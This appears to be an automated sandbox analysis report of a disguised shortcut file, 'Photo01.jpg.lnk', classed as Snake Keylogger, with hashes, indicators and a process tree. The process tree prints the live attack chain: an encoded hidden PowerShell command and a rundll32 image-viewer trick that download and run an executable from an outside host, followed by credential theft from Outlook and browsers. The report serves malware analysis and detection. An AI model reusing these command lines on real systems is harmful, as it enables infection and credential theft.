Analysis
-
max time kernel
142s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
Image012.png.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Image012.png.lnk
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Photo01.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Photo01.jpg.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Photo02.jpg.lnk
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Photo02.jpg.lnk
Resource
win10v2004-20231215-en
General
-
Target
Photo01.jpg.lnk
-
Size
2KB
-
MD5
2b91c1d78d8e65a4a8a4c8bb89267e7f
-
SHA1
37092cdcc30b44403638e19bb2b214e6fe9be2b2
-
SHA256
335dbbec54330e455233417d1ce7dd7ccc0550c1c8bdf8eaf6d3e54f1c5f0b6a
-
SHA512
6a2fe949bb755fb770d1c1c42cd0288a1f1ef1cb783aead550066ac3aa09c740ceaf13990f62400021adcd08432035147c21cb22f186969b3eec37784a2a370f
Malware Config
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 19 IoCs
resource yara_rule behavioral4/memory/3168-44-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-45-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-46-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-47-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-48-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-54-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-52-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-58-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-59-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-64-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-66-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-68-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-70-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-73-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3664-75-0x0000000000400000-0x000000000042B000-memory.dmp family_snakekeylogger behavioral4/memory/3168-77-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-76-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3168-74-0x0000000000730000-0x0000000000830000-memory.dmp family_snakekeylogger behavioral4/memory/3664-84-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 5036 powershell.exe 17 1608 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3168 jertrs[1].exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3168 set thread context of 3664 3168 jertrs[1].exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1280 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1260 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" rundll32.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\MuiCache rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 5036 powershell.exe 5036 powershell.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe 3664 regasm.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3168 jertrs[1].exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 1260 taskkill.exe Token: SeDebugPrivilege 3664 regasm.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4020 rundll32.exe 1608 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3168 jertrs[1].exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4720 wrote to memory of 4216 4720 cmd.exe 84 PID 4720 wrote to memory of 4216 4720 cmd.exe 84 PID 4216 wrote to memory of 5036 4216 cmd.exe 85 PID 4216 wrote to memory of 5036 4216 cmd.exe 85 PID 5036 wrote to memory of 4740 5036 powershell.exe 87 PID 5036 wrote to memory of 4740 5036 powershell.exe 87 PID 4740 wrote to memory of 5112 4740 cmd.exe 88 PID 4740 wrote to memory of 5112 4740 cmd.exe 88 PID 4740 wrote to memory of 4020 4740 cmd.exe 89 PID 4740 wrote to memory of 4020 4740 cmd.exe 89 PID 4020 wrote to memory of 4944 4020 rundll32.exe 92 PID 4020 wrote to memory of 4944 4020 rundll32.exe 92 PID 4740 wrote to memory of 1848 4740 cmd.exe 95 PID 4740 wrote to memory of 1848 4740 cmd.exe 95 PID 4740 wrote to memory of 1608 4740 cmd.exe 94 PID 4740 wrote to memory of 1608 4740 cmd.exe 94 PID 1848 wrote to memory of 3408 1848 cmd.exe 98 PID 1848 wrote to memory of 3408 1848 cmd.exe 98 PID 1848 wrote to memory of 1280 1848 cmd.exe 99 PID 1848 wrote to memory of 1280 1848 cmd.exe 99 PID 1848 wrote to memory of 1260 1848 cmd.exe 102 PID 1848 wrote to memory of 1260 1848 cmd.exe 102 PID 4740 wrote to memory of 2636 4740 cmd.exe 104 PID 4740 wrote to memory of 2636 4740 cmd.exe 104 PID 4740 wrote to memory of 560 4740 cmd.exe 105 PID 4740 wrote to memory of 560 4740 cmd.exe 105 PID 560 wrote to memory of 3168 560 conhost.exe 106 PID 560 wrote to memory of 3168 560 conhost.exe 106 PID 560 wrote to memory of 3168 560 conhost.exe 106 PID 3168 wrote to memory of 3664 3168 jertrs[1].exe 107 PID 3168 wrote to memory of 3664 3168 jertrs[1].exe 107 PID 3168 wrote to memory of 3664 3168 jertrs[1].exe 107 PID 3168 wrote to memory of 3664 3168 jertrs[1].exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" CmD /C powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==2⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\system32\DeviceCredentialDeployment.exeDEVIcECRedentIALdEPLOymEnt5⤵PID:5112
-
-
C:\Windows\system32\rundll32.exeRUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 85⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:00000000000000006⤵
- Modifies registry class
PID:4944
-
-
-
C:\Windows\system32\rundll32.exerundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe5⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\DeviceCredentialDeployment.exedEvicEcredeNTiAldEPlOYMeNT6⤵PID:3408
-
-
C:\Windows\system32\timeout.exetimEout /T 7 /nObREAK6⤵
- Delays execution with timeout.exe
PID:1280
-
-
C:\Windows\system32\taskkill.exeTAskkilL.Exe /F /Im rUNdlL32.exE6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B5⤵PID:2636
-
-
C:\Windows\system32\conhost.exeCoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe5⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exeC:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"7⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3664
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD5b07832ec5f73ae5f2888ebab2aa5283a
SHA1cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA5127a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
552B
MD5885e4bf9c36d1964f751bca33e898503
SHA14055100dda8ee3845cfda6735900c556d8c19ca1
SHA2565efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA5125da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3
-
Filesize
88B
MD539aceb0c8a015a4e8f66498e03ff16db
SHA14707695dece3a70bfbe55868d059a22e4325eaf0
SHA2567eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA5120cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc